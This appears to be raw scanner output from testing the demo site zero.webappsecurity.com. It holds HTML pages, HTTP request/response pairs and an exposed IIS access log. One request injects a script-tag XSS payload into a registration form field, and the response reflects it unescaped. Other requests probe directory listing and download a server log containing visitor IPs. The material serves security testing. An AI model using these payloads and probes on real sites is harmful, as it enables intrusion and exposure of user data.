VALUE="standard"><FONT SIZE="-1">Standard Graphics</FONT><BR><BR><INPUT
TYPE="submit" STYLE="border: 1px solid black"
VALUE=" Access Accounts "><BR></CENTER></FORM></TD>
<TD STYLE="border: 1px solid black" WIDTH="304" HEIGHT="217"
ROWSPAN="2"><IMG SRC="/images/lock.gif" WIDTH="304" HEIGHT="266"
BORDER="0"></TD>
</TR>
<TR>
<TD BGCOLOR="ffffff" STYLE="border: 1px solid black" WIDTH="258" HEIGHT="241"
VALIGN="TOP"><FONT SIZE="-2">We are confident of our system's ability to
protect all transactions; however, this is not an invitation for people to
attempt unauthorized access to the system. This is a private computing system
which is restricted to authorized individuals. Actual or attempted unauthorized
use of this computer system may result in criminal and/or civil prosecution. We
reserve the right to view, monitor, and record activity on the system without
notice or permission. Any information obtained by monitoring, reviewing, or
recording is subject to review by law enforcement organizations in connection
with the investigation or prosecution of possible criminal activity on the
system. If you are not an authorized user of this system or do not consent to
continued monitoring, exit the system at this time. </FONT></TD>
</TR>
</TABLE></TD>
<TD WIDTH="175" VALIGN="TOP" ROWSPAN="7"><table width="175" border="0" cellspacing="3" cellpadding="5">
<tr>
<td STYLE="border: 1px solid black"><p><img src="images/SPI_logo.jpg" width="150" height="36"></p>
<p><font size="2" face="Arial, Helvetica, sans-serif">If you would
like a free trial version of WebInspect to test this website
site.</font></p>
<p><font size="2" face="Arial, Helvetica, sans-serif"><a href="http://www.spidynamics.com/download.html" target="_blank"><strong>Download Click Here</strong></a></font></p></td>
</tr>
</table></TD>
</TR>
<TR>
<TD STYLE="border: 2px solid #2E7AA3" WIDTH="162"><IMG
SRC="/images/customer-login.gif" ALIGN="LEFT" HEIGHT="20"
BORDER="0"></TD>
</TR>
<TR>
<TD STYLE="border: 2px solid #2E7AA3" WIDTH="162"><A
HREF="/pindex.asp"><IMG SRC="/images/financial-planning.gif" ALIGN="LEFT"
BORDER="0" WIDTH="150" HEIGHT="20"></A></TD>
</TR>
<TR>
<TD STYLE="border: 2px solid #2E7AA3" WIDTH="162"
HEIGHT="19"><IMG SRC="/images/services.gif" ALIGN="LEFT" HEIGHT="20"
BORDER="0"></TD>
</TR>
<TR>
<TD STYLE="border: 2px solid #2E7AA3" WIDTH="162"
HEIGHT="24"><IMG SRC="/images/your-accounts.gif" ALIGN="LEFT" HEIGHT="20"
BORDER="0"></TD>
</TR>
<TR>
<TD STYLE="border: 2px solid #2E7AA3" WIDTH="162"><IMG
SRC="/images/customer-support.gif" ALIGN="LEFT" HEIGHT="20"
BORDER="0"></TD>
</TR>
<TR>
<TD STYLE="border-left: 12px solid #2E7AA3" WIDTH="162"
ALIGN="CENTER">
<FORM ACTION="rootlogin.asp" METHOD="post">
<P><FONT SIZE="-1" FACE="Arial"> Register for an Interest Checking
Account with FreeBank:</FONT></P>
<P><FONT SIZE="-1" FACE="Arial">First Name:</FONT><INPUT
TYPE="text" NAME="txtPassPhrase"
STYLE="border: 1px solid black; spacing: 0"><BR><FONT SIZE="-1"
FACE="Arial">Last Name:</FONT><INPUT TYPE="text" NAME="txtName"
STYLE="border: 1px solid black; spacing: 0"><BR>
<INPUT TYPE="hidden" NAME="txtHidden" VALUE="This was hidden from the user">
<INPUT TYPE="submit" STYLE="border: 1px solid black"
VALUE="Register"></P></FORM></TD>
</TR>
</TABLE>
</BODY>
</HTML>
GET /htbin/ HTTP/1.0
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 403 Access Forbidden
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:26:36 GMT
Content-Type: text/html
Content-Length: 172
<html><head><title>Directory Listing Denied</title></head>
<body><h1>Directory Listing Denied</h1>This Virtual Directory does not allow contents to be listed.</body></html>GET /join.asp?name=&email=&surname=&house=&street=&address2=>"><script>alert("XSS")</script>&town=&postcode=&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0
Referer: http://zero.webappsecurity.com:80/join1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:55:32 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 4006
Content-Type: text/html
Cache-control: private
Set-Cookie: passes3=; path=/
Set-Cookie: passes2=; path=/
Set-Cookie: passes=; path=/
<html>
<html>
<head>
<title>Join Us</title>
<STYLE>
<!--
td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial}
A:link {text-decoration: none; color: #FFFFFF;}
A:visited {text-decoration: none; color: #FEFCE0;}
A:active {text-decoration: none; color: #FFFFFF;}
A:hover {text-decoration: none; color:#CCFFFF;}
-->
</STYLE>
</HEAD>
<body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">
<td valign="top" align="center">
<table width="100%" border="0" cellpadding="5" cellspacing="0" align="center">
<tr><td height="32" bgcolor="#c000ff"><center><b>J O I N</b></center></td></tr>
<tr><td>
<table cellpadding="0" cellspacing="2" border="0" width="400" align="center">
<tr><td> </td></tr>
<tr><td> </td></tr>
<FORM ACTION="join1.asp" METHOD="get" NAME="TheForm">
<center>
<tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<TR><TD align="right" bgcolor=#003388><B>Name:</B> </TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Surname:</B> </TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B> </TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>House Number:</B> </TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Street:</B> </TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B> </TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=">"><script>alert("XSS")</script>"></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Town/City:</B> </TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Postcode:</B> </TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Country:</B> </TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Home Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#c000ff colspan='2'> </td></tr>
</center>
</Table>
</table>
</body>
</html>
GET /W3SVC6/ex001221.log HTTP/1.0
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
Date: Thu, 04 Dec 2003 16:42:57 GMT
Content-Type: application/octet-stream
Accept-Ranges: bytes
Last-Modified: Mon, 16 Jul 2001 03:47:15 GMT
ETag: "f0dbe50aadc11:8f6"
Content-Length: 22503
209.153.254.49, -, 1/10/00, 8:32:48, W3SVC6, PRIMUS, 209.153.254.45, 1859, 393, 178, 304, 0, GET, /index.html, -,
209.153.254.49, -, 1/10/00, 8:33:35, W3SVC6, PRIMUS, 209.153.254.45, 78, 271, 3504, 200, 0, GET, /index.html, -,
209.153.254.49, -, 1/10/00, 8:33:35, W3SVC6, PRIMUS, 209.153.254.45, 625, 325, 73312, 200, 0, GET, /fireworks/firewk-b.gif, -,
209.153.254.49, -, 1/10/00, 8:33:35, W3SVC6, PRIMUS, 209.153.254.45, 422, 317, 64536, 200, 0, GET, /TheMP3Zone.jpg, -,
209.153.254.45, -, 1/10/00, 8:52:10, W3SVC6, PRIMUS, 209.153.254.45, 156, 342, 3480, 200, 0, GET, /index.html, -,
209.153.254.45, -, 1/10/00, 8:52:10, W3SVC6, PRIMUS, 209.153.254.45, 454, 263, 64512, 200, 0, GET, /TheMP3Zone.jpg, -,
209.153.254.45, -, 1/10/00, 8:52:10, W3SVC6, PRIMUS, 209.153.254.45, 500, 271, 73288, 200, 0, GET, /fireworks/firewk-b.gif, -,
209.153.254.49, -, 1/10/00, 8:54:48, W3SVC6, PRIMUS, 209.153.254.45, 1203, 393, 178, 304, 0, GET, /index.html, -,
209.153.254.49, -, 1/10/00, 8:54:51, W3SVC6, PRIMUS, 209.153.254.45, 1110, 393, 178, 304, 0, GET, /index.html, -,
209.153.254.49, -, 1/10/00, 8:56:21, W3SVC6, PRIMUS, 209.153.254.45, 1203, 393, 178, 304, 0, GET, /index.html, -,
209.153.254.49, -, 1/10/00, 8:58:14, W3SVC6, PRIMUS, 209.153.254.45, 110, 321, 5464, 200, 0, GET, /sections.html, -,
209.153.254.49, -, 1/10/00, 8:58:14, W3SVC6, PRIMUS, 209.153.254.45, 141, 343, 1979, 200, 0, GET, /BennettArts/smallb-icon.GIF, -,
209.153.254.49, -, 1/10/00, 8:58:14, W3SVC6, PRIMUS, 209.153.254.45, 110, 336, 3052, 200, 0, GET, /BennettArts/back.gif, -,
209.153.254.49, -, 1/10/00, 9:01:05, W3SVC6, PRIMUS, 209.153.254.45, 937, 393, 178, 304, 0, GET, /index.html, -,
209.153.254.49, -, 1/10/00, 9:08:57, W3SVC6, PRIMUS, 209.153.254.45, 2141, 393, 178, 304, 0, GET, /index.html, -,
209.153.254.49, -, 1/10/00, 9:09:41, W3SVC6, PRIMUS, 209.153.254.45, 1141, 394, 178, 304, 0, GET, /index.html, -,
209.153.254.48, -, 1/10/00, 11:00:53, W3SVC6, PRIMUS, 209.153.254.45, 63, 323, 3480, 200, 0, GET, /index.html, -,
209.153.254.48, -, 1/10/00, 11:00:53, W3SVC6, PRIMUS, 209.153.254.45, 297, 382, 73288, 200, 0, GET, /fireworks/firewk-b.gif, -,
209.153.254.48, -, 1/10/00, 11:00:53, W3SVC6, PRIMUS, 209.153.254.45, 453, 374, 64512, 200, 0, GET, /TheMP3Zone.jpg, -,
216.32.64.10, -, 1/10/00, 11:15:40, W3SVC6, PRIMUS, 209.153.254.45, 437, 142, 3480, 200, 0, GET, /index.html, -,
216.32.64.10, -, 1/10/00, 11:21:07, W3SVC6, PRIMUS, 209.153.254.45, 390, 155, 5440, 200, 0, GET, /sections.html, -,
216.32.64.10, -, 1/10/00, 11:21:50, W3SVC6, PRIMUS, 209.153.254.45, 0, 159, 623, 404, 2, GET, /millenniumsurvey/, -,
216.32.64.10, -, 1/10/00, 11:22:01, W3SVC6, PRIMUS, 209.153.254.45, 453, 166, 3559, 200, 0, GET, /TheHipHopZone/index.html, -,
216.32.64.10, -, 1/10/00, 11:22:15, W3SVC6, PRIMUS, 209.153.254.45, 843, 171, 6749, 200, 0, GET, /Michael_Hurst/recordings.html, -,
216.32.64.10, -, 1/10/00, 11:22:29, W3SVC6, PRIMUS, 209.153.254.45, 516, 166, 4398, 200, 0, GET, /TheTechnoZone/index.html, -,
216.32.64.10, -, 1/10/00, 11:22:41, W3SVC6, PRIMUS, 209.153.254.45, 547, 167, 4971, 200, 0, GET, /TheAmbientZone/index.html, -,
216.32.64.10, -, 1/10/00, 11:22:44, W3SVC6, PRIMUS, 209.153.254.45, 672, 169, 4967, 200, 0, GET, /TheClassicalZone/index.html, -,
216.32.64.10, -, 1/10/00, 11:23:44, W3SVC6, PRIMUS, 209.153.254.45, 531, 164, 3973, 200, 0, GET, /TheFolkZone/index.html, -,
216.32.64.10, -, 1/10/00, 11:23:51, W3SVC6, PRIMUS, 209.153.254.45, 0, 175, 623, 404, 3, GET, /TheClassicalZone/Dec30/index.html, -,
216.32.64.10, -, 1/10/00, 11:23:59, W3SVC6, PRIMUS, 209.153.254.45, 2765, 211, 1327976, 200, 64, GET, /Lori_Pappajohn/audio/Lori_Pappajohn-The_Minstrel's_Dream(excerpt).mp3, -,
216.32.64.10, -, 1/10/00, 11:24:06, W3SVC6, PRIMUS, 209.153.254.45, 2688, 212, 1743327, 200, 64, GET, /Lori_Pappajohn/audio/Lori_Pappajohn-First_Snows_of_Winter(excerpt).mp3, -,
216.32.64.10, -, 1/10/00, 11:24:17, W3SVC6, PRIMUS, 209.153.254.45, 265, 166, 2791, 200, 0, GET, /Michael_Hurst/index.html, -,
216.32.64.10, -, 1/10/00, 11:24:24, W3SVC6, PRIMUS, 209.153.254.45, 1203, 162, 22076, 200, 0, GET, /TheMP3Zone-News.html, -,
216.32.64.10, -, 1/10/00, 11:24:34, W3SVC6, PRIMUS, 209.153.254.45, 391, 157, 1100, 200, 0, GET, /Graeme_Bennett/index.html, -,
216.32.64.10, -, 1/10/00, 11:25:00, W3SVC6, PRIMUS, 209.153.254.45, 32, 181, 623, 404, 2, GET, /TheHipHopZone/javascript:history.back(), -,
216.32.64.10, -, 1/10/00, 11:25:15, W3SVC6, PRIMUS, 209.153.254.45, 0, 182, 623, 404, 2, GET, /TheAmbientZone/javascript:history.back(), -,
216.32.64.10, -, 1/10/00, 11:25:22, W3SVC6, PRIMUS, 209.153.254.45, 234, 167, 1029, 200, 0, GET, /Graeme_Bennett/index.html, -,
216.32.64.10, -, 1/10/00, 11:25:47, W3SVC6, PRIMUS, 209.153.254.45, 516, 156, 4468, 200, 0, GET, /TheTechnoZone/index.html, -,
216.32.64.10, -, 1/10/00, 11:25:58, W3SVC6, PRIMUS, 209.153.254.45, 453, 157, 5042, 200, 0, GET, /TheAmbientZone/index.html, -,
209.153.254.48, -, 1/10/00, 13:06:01, W3SVC6, PRIMUS, 209.153.254.45, 63, 323, 3480, 200, 0, GET, /index.html, -,
209.153.254.48, -, 1/10/00, 13:06:01, W3SVC6, PRIMUS, 209.153.254.45, 516, 374, 64512, 200, 0, GET, /TheMP3Zone.jpg, -,
209.153.254.48, -, 1/10/00, 13:06:01, W3SVC6, PRIMUS, 209.153.254.45, 641, 382, 73288, 200, 0, GET, /fireworks/firewk-b.gif, -,
209.153.254.53, -, 1/10/00, 13:07:43, W3SVC6, PRIMUS, 209.153.254.45, 63, 229, 3480, 200, 0, GET, /index.html, -,
209.153.254.53, -, 1/10/00, 13:07:43, W3SVC6, PRIMUS, 209.153.254.45, 1547, 288, 73288, 200, 0, GET, /fireworks/firewk-b.gif, -,
209.153.254.53, -, 1/10/00, 13:07:46, W3SVC6, PRIMUS, 209.153.254.45, 1813, 280, 64512, 200, 0, GET, /TheMP3Zone.jpg, -,
209.53.10.158, -, 1/10/00, 13:10:28, W3SVC6, PRIMUS, 209.153.254.45, 406, 314, 3480, 200, 0, GET, /index.html, -,
209.53.10.158, -, 1/10/00, 13:10:28, W3SVC6, PRIMUS, 209.153.254.45, 1813, 300, 73288, 200, 0, GET, /fireworks/firewk-b.gif, -,
209.53.10.158, -, 1/10/00, 13:10:28, W3SVC6, PRIMUS, 209.153.254.45, 1516, 292, 64512, 200, 0, GET, /TheMP3Zone.jpg, -,
209.153.254.53, -, 1/10/00, 13:10:39, W3SVC6, PRIMUS, 209.153.254.45, 93, 279, 5440, 200, 0, GET, /sections.html, -,
209.153.254.53, -, 1/10/00, 13:10:39, W3SVC6, PRIMUS, 209.153.254.45, 93, 306, 1955, 200, 0, GET, /BennettArts/smallb-icon.GIF, -,
209.153.254.53, -, 1/10/00, 13:10:39, W3SVC6, PRIMUS, 209.153.254.45, 94, 299, 3028, 200, 0, GET, /BennettArts/back.gif, -,
209.153.254.45, -, 1/10/00, 13:20:30, W3SVC6, PRIMUS, 209.153.254.45, 157, 392, 5440, 200, 0, GET, /sections.html, -,
209.153.254.45, -, 1/10/00, 13:20:30, W3SVC6, PRIMUS, 209.153.254.45, 15, 289, 1955, 200, 0, GET, /BennettArts/smallb-icon.GIF, -,
209.153.254.45, -, 1/10/00, 13:20:30, W3SVC6, PRIMUS, 209.153.254.45, 218, 282, 3028, 200, 0, GET, /BennettArts/back.gif, -,
209.153.254.48, -, 1/10/00, 13:23:54, W3SVC6, PRIMUS, 209.153.254.45, 219, 373, 5440, 200, 0, GET, /sections.html, -,
209.153.254.48, -, 1/10/00, 13:23:54, W3SVC6, PRIMUS, 209.153.254.45, 297, 387, 64512, 200, 0, GET, /TheMP3Zone.jpg, -,
209.153.254.48, -, 1/10/00, 13:23:54, W3SVC6, PRIMUS, 209.153.254.45, 62, 400, 1955, 200, 0, GET, /BennettArts/smallb-icon.GIF, -,
209.153.254.48, -, 1/10/00, 13:23:54, W3SVC6, PRIMUS, 209.153.254.45, 219, 393, 3028, 200, 0, GET, /BennettArts/back.gif, -,
209.53.9.226, -, 1/10/00, 13:57:25, W3SVC6, PRIMUS, 209.153.254.45, 30906, 358, 178, 304, 0, GET, /index.html, -,
209.53.9.226, -, 1/10/00, 13:57:25, W3SVC6, PRIMUS, 209.153.254.45, 125, 232, 3480, 200, 0, GET, /index.html, -,
209.53.9.226, -, 1/10/00, 13:57:25, W3SVC6, PRIMUS, 209.153.254.45, 610, 283, 64512, 200, 0, GET, /TheMP3Zone.jpg, -,
209.53.9.226, -, 1/10/00, 13:57:25, W3SVC6, PRIMUS, 209.153.254.45, 641, 291, 73288, 200, 0, GET, /fireworks/firewk-b.gif, -,
209.53.9.226, -, 1/10/00, 13:57:28, W3SVC6, PRIMUS, 209.153.254.45, 1734, 232, 3480, 200, 0, GET, /index.html, -,
209.53.9.226, -, 1/10/00, 13:57:28, W3SVC6, PRIMUS, 209.153.254.45, 110, 283, 64512, 200, 0, GET, /TheMP3Zone.jpg, -,
209.53.9.226, -, 1/10/00, 13:57:28, W3SVC6, PRIMUS, 209.153.254.45, 2390, 291, 73288, 200, 0, GET, /fireworks/firewk-b.gif, -,
209.53.9.226, -, 1/10/00, 13:57:30, W3SVC6, PRIMUS, 209.153.254.45, 2125, 320, 178, 304, 0, GET, /index.html, -,
209.53.9.226, -, 1/10/00, 13:57:38, W3SVC6, PRIMUS, 209.153.254.45, 9375, 378, 121, 304, 0, GET, /fireworks/firewk-b.gif, -,
209.53.9.226, -, 1/10/00, 13:57:38, W3SVC6, PRIMUS, 209.153.254.45, 7875, 370, 121, 304, 0, GET, /TheMP3Zone.jpg, -,
209.53.9.226, -, 1/10/00, 13:57:38, W3SVC6, PRIMUS, 209.153.254.45, 79, 320, 178, 304, 0, GET, /index.html, -,
209.53.9.226, -, 1/10/00, 13:57:45, W3SVC6, PRIMUS, 209.153.254.45, 7359, 378, 121, 304, 0, GET, /fireworks/firewk-b.gif, -,
209.53.9.226, -, 1/10/00, 13:57:45, W3SVC6, PRIMUS, 209.153.254.45, 94, 282, 5440, 200, 0, GET, /sections.html, -,
209.53.9.226, -, 1/10/00, 13:57:45, W3SVC6, PRIMUS, 209.153.254.45, 7500, 370, 121, 304, 0, GET, /TheMP3Zone.jpg, -,
209.53.9.226, -, 1/10/00, 13:57:45, W3SVC6, PRIMUS, 209.153.254.45, 78, 309, 1955, 200, 0, GET, /BennettArts/smallb-icon.GIF, -,
209.53.9.226, -, 1/10/00, 13:57:45, W3SVC6, PRIMUS, 209.153.254.45, 281, 302, 3028, 200, 0, GET, /BennettArts/back.gif, -,
209.53.9.226, -, 1/10/00, 13:57:48, W3SVC6, PRIMUS, 209.153.254.45, 2859, 302, 22076, 200, 0, GET, /TheMP3Zone-News.html, -,
209.153.254.49, -, 1/10/00, 16:01:36, W3SVC6, PRIMUS, 209.153.254.45, 63, 271, 3504, 200, 0, GET, /index.html, -,
209.153.254.49, -, 1/10/00, 16:01:36, W3SVC6, PRIMUS, 209.153.254.45, 594, 325, 73312, 200, 0, GET, /fireworks/firewk-b.gif, -,
209.153.254.49, -, 1/10/00, 16:01:36, W3SVC6, PRIMUS, 209.153.254.45, 406, 317, 64536, 200, 0, GET, /TheMP3Zone.jpg, -,
209.53.10.158, -, 1/11/00, 0:19:32, W3SVC6, PRIMUS, 209.153.254.45, 0, 324, 623, 404, 2, GET, /musicstore, -,
209.53.10.158, -, 1/11/00, 0:19:36, W3SVC6, PRIMUS, 209.153.254.45, 0, 327, 623, 404, 2, GET, /musicstore, -,
209.53.10.158, -, 1/11/00, 0:19:40, W3SVC6, PRIMUS, 209.153.254.45, 125, 402, 178, 304, 0, GET, /index.html, -,
209.53.10.158, -, 1/11/00, 0:19:40, W3SVC6, PRIMUS, 209.153.254.45, 1125, 387, 121, 304, 0, GET, /fireworks/firewk-b.gif, -,
209.53.10.158, -, 1/11/00, 0:19:40, W3SVC6, PRIMUS, 209.153.254.45, 62, 364, 5440, 200, 0, GET, /sections.html, -,
209.53.10.158, -, 1/11/00, 0:19:40, W3SVC6, PRIMUS, 209.153.254.45, 1281, 379, 121, 304, 0, GET, /TheMP3Zone.jpg, -,
209.53.10.158, -, 1/11/00, 0:19:40, W3SVC6, PRIMUS, 209.153.254.45, 63, 318, 1955, 200, 0, GET, /BennettArts/smallb-icon.GIF, -,
209.53.10.158, -, 1/11/00, 0:19:40, W3SVC6, PRIMUS, 209.153.254.45, 313, 311, 3028, 200, 0, GET, /BennettArts/back.gif, -,
209.53.10.158, -, 1/11/00, 0:19:44, W3SVC6, PRIMUS, 209.153.254.45, 2406, 384, 22076, 200, 0, GET, /TheMP3Zone-News.html, -,
209.41.137.160, -, 1/11/00, 19:13:39, W3SVC6, PRIMUS, 209.153.254.45, 2563, 195, 3480, 200, 0, GET, /index.html, -,
209.41.137.160, -, 1/11/00, 19:14:33, W3SVC6, PRIMUS, 209.153.254.45, 53906, 254, 73288, 200, 64, GET, /fireworks/firewk-b.gif, -,
209.41.137.160, -, 1/11/00, 19:14:33, W3SVC6, PRIMUS, 209.153.254.45, 53437, 246, 64512, 200, 64, GET, /TheMP3Zone.jpg, -,
209.41.137.160, -, 1/11/00, 19:14:38, W3SVC6, PRIMUS, 209.153.254.45, 4312, 245, 5440, 200, 0, GET, /sections.html, -,
209.41.137.160, -, 1/11/00, 19:14:50, W3SVC6, PRIMUS, 209.153.254.45, 2343, 272, 1955, 200, 0, GET, /BennettArts/smallb-icon.GIF, -,
209.41.137.160, -, 1/11/00, 19:14:53, W3SVC6, PRIMUS, 209.153.254.45, 3000, 265, 3028, 200, 0, GET, /BennettArts/back.gif, -,
209.41.137.160, -, 1/11/00, 19:15:54, W3SVC6, PRIMUS, 209.153.254.45, 61375, 267, 4309, 200, 0, GET, /TheRockZone/index.html, -,
209.41.137.160, -, 1/11/00, 19:15:54, W3SVC6, PRIMUS, 209.153.254.45, 76500, 366, 24525, 206, 0, GET, /TheMP3Zone.jpg, -,
209.41.137.160, -, 1/11/00, 19:15:54, W3SVC6, PRIMUS, 209.153.254.45, 157, 286, 623, 404, 3, GET, /BennettArts/pics/smallb-icon.GIF, -,
209.41.137.160, -, 1/11/00, 19:15:54, W3SVC6, PRIMUS, 209.153.254.45, 0, 279, 623, 404, 3, GET, /BennettArts/pics/back.gif, -,
209.41.137.160, -, 1/11/00, 19:16:20, W3SVC6, PRIMUS, 209.153.254.45, 26094, 281, 52155, 200, 64, GET, /TheRockZone/TheRockZone.jpg, -,
209.41.137.160, -, 1/11/00, 19:16:20, W3SVC6, PRIMUS, 209.153.254.45, 531, 332, 121, 304, 0, GET, /sections.html, -,
209.41.137.160, -, 1/11/00, 19:16:20, W3SVC6, PRIMUS, 209.153.254.45, 469, 296, 121, 304, 0, GET, /TheMP3Zone.jpg, -,
209.41.137.160, -, 1/11/00, 19:16:30, W3SVC6, PRIMUS, 209.153.254.45, 7656, 359, 121, 304, 0, GET, /BennettArts/smallb-icon.GIF, -,
209.41.137.160, -, 1/11/00, 19:16:33, W3SVC6, PRIMUS, 209.153.254.45, 3094, 268, 3869, 200, 0, GET, /TheMovieZone/index.html, -,
209.41.137.160, -, 1/11/00, 19:16:33, W3SVC6, PRIMUS, 209.153.254.45, 10750, 352, 121, 304, 0, GET, /BennettArts/back.gif, -,
209.41.137.160, -, 1/11/00, 19:17:16, W3SVC6, PRIMUS, 209.153.254.45, 43563, 284, 38623, 200, 0, GET, /TheMovieZone/TheMovieZone.jpg, -,
209.41.137.160, -, 1/11/00, 19:18:04, W3SVC6, PRIMUS, 209.153.254.45, 47625, 332, 121, 304, 0, GET, /sections.html, -,
209.41.137.160, -, 1/11/00, 19:18:11, W3SVC6, PRIMUS, 209.153.254.45, 531, 283, 178, 304, 0, GET, /index.html, -,
209.41.137.160, -, 1/11/00, 19:18:17, W3SVC6, PRIMUS, 209.153.254.45, 5750, 361, 32764, 206, 64, GET, /fireworks/firewk-b.gif, -,
209.41.137.160, -, 1/11/00, 19:18:17, W3SVC6, PRIMUS, 209.153.254.45, 5406, 283, 121, 304, 0, GET, /TheMP3Zone.jpg, -,
209.41.137.160, -, 1/11/00, 19:18:17, W3SVC6, PRIMUS, 209.153.254.45, 1250, 332, 121, 304, 0, GET, /sections.html, -,
209.41.137.160, -, 1/11/00, 19:19:24, W3SVC6, PRIMUS, 209.153.254.45, 65656, 359, 121, 304, 0, GET, /BennettArts/smallb-icon.GIF, -,
209.41.137.160, -, 1/11/00, 19:19:24, W3SVC6, PRIMUS, 209.153.254.45, 65250, 352, 121, 304, 0, GET, /BennettArts/back.gif, -,
195.139.238.41, -, 1/11/00, 22:51:29, W3SVC6, PRIMUS, 209.153.254.45, 0, 466, 604, 404, 3, GET, /pcbuyersguide/hardware/printers/Best_Tabloid_Lasers-Q100.html, -,
195.139.238.41, -, 1/11/00, 22:51:35, W3SVC6, PRIMUS, 209.153.254.45, 1156, 406, 3480, 200, 0, GET, /index.html, -,
195.139.238.41, -, 1/11/00, 22:51:41, W3SVC6, PRIMUS, 209.153.254.45, 6000, 237, 73288, 200, 64, GET, /fireworks/firewk-b.gif, -,
195.139.238.41, -, 1/11/00, 22:51:44, W3SVC6, PRIMUS, 209.153.254.45, 8531, 229, 64512, 200, 64, GET, /TheMP3Zone.jpg, -,
195.34.192.2, -, 1/12/00, 12:07:38, W3SVC6, PRIMUS, 209.153.254.45, 0, 500, 623, 404, 3, GET, /pcbuyersguide/hardware/motherboards/motherboard-listings.html, -,
195.34.192.2, -, 1/12/00, 12:07:57, W3SVC6, PRIMUS, 209.153.254.45, 0, 494, 623, 404, 3, GET, /pcbuyersguide/hardware/motherboards/specs/J-M_Slot1.htm, -,
143.236.201.55, -, 1/12/00, 12:48:37, W3SVC6, PRIMUS, 209.153.254.45, 0, 389, 604, 404, 3, GET, /themp3zone/Michael_Hurst/recordings.html, -,
209.53.10.158, -, 1/12/00, 16:33:24, W3SVC6, PRIMUS, 209.153.254.45, 188, 402, 178, 304, 0, GET, /index.html, -,
209.53.10.158, -, 1/12/00, 16:33:24, W3SVC6, PRIMUS, 209.153.254.45, 1625, 387, 121, 304, 0, GET, /fireworks/firewk-b.gif, -,
209.53.10.158, -, 1/12/00, 16:33:24, W3SVC6, PRIMUS, 209.153.254.45, 1844, 379, 121, 304, 0, GET, /TheMP3Zone.jpg, -,
209.53.10.158, -, 1/12/00, 16:33:24, W3SVC6, PRIMUS, 209.153.254.45, 312, 451, 121, 304, 0, GET, /sections.html, -,
209.53.10.158, -, 1/12/00, 16:34:26, W3SVC6, PRIMUS, 209.153.254.45, 60640, 405, 121, 304, 0, GET, /BennettArts/smallb-icon.GIF, -,
209.53.10.158, -, 1/12/00, 16:34:26, W3SVC6, PRIMUS, 209.153.254.45, 60594, 398, 121, 304, 0, GET, /BennettArts/back.gif, -,
206.132.186.140, -, 1/12/00, 19:59:22, W3SVC6, PRIMUS, 209.153.254.45, 0, 143, 604, 404, 2, GET, /robots.txt, -,
